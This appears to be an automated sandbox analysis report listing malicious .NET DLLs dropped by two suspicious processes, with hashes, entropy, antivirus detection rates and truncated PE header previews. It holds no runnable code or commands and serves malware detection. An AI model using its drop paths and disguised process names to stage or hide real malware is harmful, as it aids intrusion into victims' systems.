                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):24576
                                                                Entropy (8bit):5.535426842040921
                                                                Encrypted:false
                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):28160
                                                                Entropy (8bit):5.570953308352568
                                                                Encrypted:false
                                                                SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):40448
                                                                Entropy (8bit):5.7028690200758465
                                                                Encrypted:false
                                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):70144
                                                                Entropy (8bit):5.909536568846014
                                                                Encrypted:false
                                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.629584586954759
                                                                Encrypted:false
                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):126976
                                                                Entropy (8bit):6.057993947082715
                                                                Encrypted:false
                                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):36352
                                                                Entropy (8bit):5.668291349855899
                                                                Encrypted:false
                                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38912
                                                                Entropy (8bit):5.679286635687991
                                                                Encrypted:false
                                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):50176
                                                                Entropy (8bit):5.723168999026349
                                                                Encrypted:false
                                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):342528
                                                                Entropy (8bit):6.170134230759619
                                                                Encrypted:false
                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):5.645950918301459
                                                                Encrypted:false
                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):46592
                                                                Entropy (8bit):5.870612048031897
                                                                Encrypted:false
                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):28160
                                                                Entropy (8bit):5.570953308352568
                                                                Encrypted:false
                                                                SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):5.645950918301459
                                                                Encrypted:false
                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):70144
                                                                Entropy (8bit):5.909536568846014
                                                                Encrypted:false
                                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38912
                                                                Entropy (8bit):5.679286635687991
                                                                Encrypted:false
                                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):85504
                                                                Entropy (8bit):5.8769270258874755
                                                                Encrypted:false
                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):46592
                                                                Entropy (8bit):5.870612048031897
                                                                Encrypted:false
                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33792
                                                                Entropy (8bit):5.541771649974822
                                                                Encrypted:false
                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):5.932541123129161
                                                                Encrypted:false
                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):85504
                                                                Entropy (8bit):5.8769270258874755
                                                                Encrypted:false
                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
